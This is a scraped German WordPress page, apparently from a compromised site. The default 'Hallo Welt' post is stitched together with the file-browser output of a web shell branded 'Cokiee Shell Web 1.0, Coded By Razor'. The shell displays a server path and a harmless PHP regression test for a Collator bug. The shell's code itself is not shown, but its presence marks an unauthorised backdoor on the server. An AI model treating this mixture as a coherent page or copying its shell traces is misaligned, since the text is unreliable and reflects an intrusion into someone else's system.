Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/intl/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/intl/tests/bug60192-getlocale.phpt |
--TEST-- Bug #60192 (SegFault when Collator not constructed properly) --SKIPIF-- <?php if (!extension_loaded('intl')) { die('skip intl extension not available'); } ?> --FILE-- <?php class Collator2 extends Collator{ public function __construct() { // omitting parent::__construct($someLocale); } } $c = new Collator2(); $c->getLocale(Locale::ACTUAL_LOCALE); --EXPECTF-- Catchable fatal error: Collator::getLocale(): Object not initialized in %s on line %d
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare